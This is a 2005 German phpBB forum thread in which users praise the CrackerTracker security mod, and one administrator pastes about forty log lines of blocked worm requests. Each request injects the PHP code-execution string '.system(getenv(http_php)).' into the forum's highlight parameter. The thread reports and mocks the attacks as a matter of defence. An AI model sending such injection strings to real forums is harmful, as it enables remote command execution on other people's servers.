Logfile des CrackerTracker

Sicherheit des Webservers, der Server und rund um phpBB
ToXic
Beiträge: 103
Registriert: Fr 04.Mär, 2005 10:37

Beitrag von ToXic »

[quote="cback - Mo 20.Jun, 2005 11:30";p="36215"]
Aber die Entwicklung dauert sicher noch ein bisschen[/quote]

Mein lieber Schwan,
was will ich da noch sagen? Cback hat es einfach drauf. Ich bin echt schon gespannt auf die neue Version ... das wird ja der hammer ^b

Jo, und wenn ich schon am loben bin, darf auch OxPus und die gesamte Community nicht fehlen. Ich habe hier sehr viel Unterstützung und Hilfe erfahren können ... :respect:

MfG
ToXic
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

:eek: :o
Danke danke. Das baut wirklich auf.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

Mich auch. Danke :)
Benutzeravatar
Zaubi
Beiträge: 62
Registriert: Do 16.Jun, 2005 09:07
Wohnort: L?bau - Oberlausitz
Kontaktdaten:

Beitrag von Zaubi »

der screenshot lässt ja auf ein hammertool hoffen.
da dürfen sich die bösen jungs schon mal beim strickkurs anmelden ;) schmunzel

ich schließ mich toxic gleich mal an, ... danke an das boardteam,
seit ich hier angemeldet bin, schlaf ich viel besser. ;)

winkeeeee zaubi
Benutzeravatar
AmigaLink
Beiträge: 5843
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink »

Hej hej, da wollte es aber heute einer wissen:
27.07.2005, 17:16 209.188.15.15 Mozilla/4.0 t=2126&start=30&highlight='.system(getenv(http_php)).'
27.07.2005, 17:15 209.188.15.15 Mozilla/4.0 t=2126&highlight='.system(getenv(http_php)).'
27.07.2005, 17:15 220.135.137.116 Mozilla/4.0 t=3913&highlight='.system(getenv(http_php)).'
27.07.2005, 17:14 216.55.183.226 Mozilla/4.0 t=6451&highlight='.system(getenv(http_php)).'
27.07.2005, 17:10 196.30.191.46 Mozilla/4.0 t=8623&highlight='.system(getenv(http_php)).'
27.07.2005, 17:10 64.74.110.250 Mozilla/4.0 t=5613&highlight='.system(getenv(http_php)).'
27.07.2005, 17:07 216.32.67.50 Mozilla/4.0 t=6019&highlight='.system(getenv(http_php)).'
27.07.2005, 17:07 220.135.137.116 Mozilla/4.0 t=6282&highlight='.system(getenv(http_php)).'
27.07.2005, 17:04 163.24.233.11 Mozilla/4.0 t=3719&highlight='.system(getenv(http_php)).'
27.07.2005, 17:03 216.131.96.112 Mozilla/4.0 t=2958&highlight='.system(getenv(http_php)).'
27.07.2005, 17:02 220.135.137.116 Mozilla/4.0 t=6519&highlight='.system(getenv(http_php)).'
27.07.2005, 17:01 209.68.4.104 Mozilla/4.0 t=4477&highlight='.system(getenv(http_php)).'
27.07.2005, 17:01 209.188.15.15 Mozilla/4.0 t=847&highlight='.system(getenv(http_php)).'
27.07.2005, 16:59 209.68.4.104 Mozilla/4.0 t=5848&highlight='.system(getenv(http_php)).'
27.07.2005, 16:58 217.160.176.199 Mozilla/4.0 t=9399&highlight='.system(getenv(http_php)).'
27.07.2005, 16:56 63.209.253.134 Mozilla/4.0 t=2145&highlight='.system(getenv(http_php)).'
27.07.2005, 16:55 163.24.233.11 Mozilla/4.0 t=4976&highlight='.system(getenv(http_php)).'
27.07.2005, 16:52 217.160.176.199 Mozilla/4.0 t=8954&highlight=&highlight='.system(getenv(http_php)).'
27.07.2005, 16:48 147.202.44.35 Mozilla/4.0 t=7874&highlight='.system(getenv(http_php)).'
27.07.2005, 16:47 220.135.137.116 Mozilla/4.0 t=8529&highlight='.system(getenv(http_php)).'
27.07.2005, 16:39 69.73.171.139 Mozilla/4.0 t=4671&highlight='.system(getenv(http_php)).'
27.07.2005, 16:38 69.44.157.251 Mozilla/4.0 t=3406&highlight='.system(getenv(http_php)).'
27.07.2005, 16:37 220.245.179.132 Mozilla/4.0 t=963&highlight='.system(getenv(http_php)).'
27.07.2005, 16:36 202.47.247.130 Mozilla/4.0 t=8193&highlight='.system(getenv(http_php)).'
27.07.2005, 16:27 147.202.44.35 Mozilla/4.0 t=9511&highlight='.system(getenv(http_php)).'
27.07.2005, 16:22 72.9.246.202 Mozilla/4.0 t=5285&highlight='.system(getenv(http_php)).'
27.07.2005, 16:21 217.115.138.112 Mozilla/4.0 t=9375&highlight='.system(getenv(http_php)).'
27.07.2005, 16:20 216.32.67.50 Mozilla/4.0 t=7090&highlight='.system(getenv(http_php)).'
27.07.2005, 16:16 163.24.233.11 Mozilla/4.0 t=5065&highlight='.system(getenv(http_php)).'
27.07.2005, 16:16 217.160.176.199 Mozilla/4.0 t=8412&highlight='.system(getenv(http_php)).'
27.07.2005, 16:16 12.151.22.22 Mozilla/4.0 t=6807&highlight='.system(getenv(http_php)).'
27.07.2005, 16:13 66.98.130.6 Mozilla/4.0 t=1711&highlight='.system(getenv(http_php)).'
27.07.2005, 16:09 69.44.157.251 Mozilla/4.0 t=1143&highlight='.system(getenv(http_php)).'
27.07.2005, 16:08 60.248.70.246 Mozilla/4.0 t=7417&highlight='.system(getenv(http_php)).'
27.07.2005, 15:56 217.160.176.199 Mozilla/4.0 t=8508&highlight='.system(getenv(http_php)).'
27.07.2005, 15:56 209.68.2.81 Mozilla/4.0 t=4367&highlight='.system(getenv(http_php)).'
27.07.2005, 15:56 66.98.130.6 Mozilla/4.0 t=3308&highlight='.system(getenv(http_php)).'
27.07.2005, 15:55 65.254.49.26 Mozilla/4.0 t=9146&highlight='.system(getenv(http_php)).'
27.07.2005, 15:54 69.73.171.139 Mozilla/4.0 t=7562&highlight='.system(getenv(http_php)).'
Der erste Versuch seit langem und dann gleich 789 Angriffe, auf EmF, heute!!! :eek:
Und weitere 30, mit gleichem Strickmuster, auf AmigaLink.de. ^9

Da kann ich nur nochmal ein Dankeschön an cback schicken. :D

// EDIT
Er versucht es immer noch alle paar Minuten. :bofl:
Zuletzt geändert von AmigaLink am Mi 27.Jul, 2005 22:42, insgesamt 1-mal geändert.
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Mit geht es nicht anders, obwohl die Anzahl der Attacken noch recht gering ist.
Aber schon verwunderlich, mit welchen profanen Mitteln die versuchen, einzubrechen :nono
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
AmigaLink
Beiträge: 5843
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink »

Das ist heute die erste Angriffswelle seit einbau des CTracker Pro!
Es gab somit erst einen eintrag im Logfile, der wiederum von mir beim Test verursacht wurde. Und nun sind es aktuell bereits 793. :eek:

// EDIT
Hartnäckiger Geselle. :eek:
Mittlerweile bin ich (ist er) bei 1200 angekommen. :rolleyes:
Zuletzt geändert von AmigaLink am Do 28.Jul, 2005 13:46, insgesamt 1-mal geändert.
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]
Twins

Beitrag von Twins »

Seit den neuen CrackerTracker Update sind die Attacken in meinen Forum von 4000 auf 6000 gestiegen. :eek:
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

Jo bei mir gehts auch gewaltig rund mit den Attacken. Bei Oxpus auch wie man sieht aber die dynamischen Definitionen haben ja schnell den neuen Wurm in die Badlist aufgenommen *diabolischlach*

Wurm-Massenmörder. Ausgezeichnet :D :D :D :D
Twins

Beitrag von Twins »

Kann es eiegntlich passieren, das der CrackerTracker "kaputt" geht? Also wenn es ZUVIELE Attacken gibt...Geht das überhaupt oder kann der CrackerTracker nicht kaputt gehen?
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

Unwahrscheinlicher als ein 6er im Lotto
Twins

Beitrag von Twins »

Also unzerstörbar, könnte man sagen...Tja, da haben die Angreifer Pech gehabt...Ich würde gerne denen ihr Gesicht sehen, nach einen Misslungenen Angriff und dieser Lol-Seite. :)
Benutzeravatar
AmigaLink
Beiträge: 5843
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink »

Twins hat geschrieben:Also unzerstörbar, könnte man sagen...Tja, da haben die Angreifer Pech gehabt...Ich würde gerne denen ihr Gesicht sehen, nach einen Misslungenen Angriff und dieser Lol-Seite. :)
Also bei der derzeitigen Angriffswelle kannst du davon ausgehen das es kein dummes Gesicht geben wird. Denn die Angriffe werden von einem Wurm vorgenommen! :mad:
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]
Twins

Beitrag von Twins »

Weiß ich doch...Irgentwer muss die Würmer ja programmiert haben...Der Sasser programmierer zum Beispiel...Der war glaub ich erst 17 oder 18.
Benutzeravatar
AmigaLink
Beiträge: 5843
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink »

cback ist auch erst 19. ;)
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

Auch der coder des wurmes kriegts nicht mit ob der Wurm erfolg hat in nem board oder nicht. :wall: :wall: [schild=2 fontcolor=000000 shadowcolor=C0C0C0 shieldshadow=1]Nacktnasenwombert[/schild]
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Leider.
Und hier bei OXPUS.de scheint er ebenfalls langsam anzufangen, sich eine blutige Nase zu holen :maad:
Zuletzt geändert von oxpus am Do 28.Jul, 2005 15:58, insgesamt 1-mal geändert.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

Ihr müsst das vorstellen wie diese <erregte stimme>kaltblütigen, blutrünstigen, mordlustigen</erregte stimme> Insektenvernichter mit Strom. Wos immer so ne schöne Explosion gibt wenn da was reinfliegt. Genau so arbeitet der CTracker auch :D
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Besser kann man sowas <unglaublich sauer>abartiges</unglaublich sauer> nicht umschreiben.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

[quote="oxpus - 7.Juli 2005, 16:23";p="39978"]Besser kann man sowas <unglaublich sauer>abartiges</unglaublich sauer> nicht umschreiben.[/quote]

<französischer akzent>Ischweiss</französischer akzent> :D
Benutzeravatar
AmigaLink
Beiträge: 5843
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink »

:bofl:

// EDIT
2232 blocked attacks

Es sieht ganz so aus, als würde der Wurm vorhaben, den Angriff bei all meinen threads zu versuchen. ^5
Zuletzt geändert von AmigaLink am Fr 29.Jul, 2005 21:13, insgesamt 1-mal geändert.
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Der gehts vermeintlich wahllos durch. Aber nur vermeintlich:
Ich vermute, das er Bot-Daten verwendet, um die Topic-IDs zu treffen.
Alle Stichproben waren bei mir z.b. gültige Topic_IDs :(
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
AmigaLink
Beiträge: 5843
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink »

Solange der Ctracker seine Arbeit verichtet, sollte es mir ja eigentlich egal sein. Aber irgendwie finde ich es heftig wie sehr sich der Wurm bei mir festgefrassen hat.
2475 blocked attacks in 2 Tagen ist schon der Hammer! Und bremsen das Board, trotz frühzeitiger blockung, schon spürbar aus. :(
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

Zur gleichen Zeit an einem Computer der den Wurmprogrammierer "enthält"

Frederik, die Mutti geht nach Hause.
Frederik, die Mutti geht nach Hause.



Frederik, die Mutti geht nach Hause.


Frederik, die Mutti geht nach Hause. :D
Benutzeravatar
AmigaLink
Beiträge: 5843
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink »

:lol:
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]
Antworten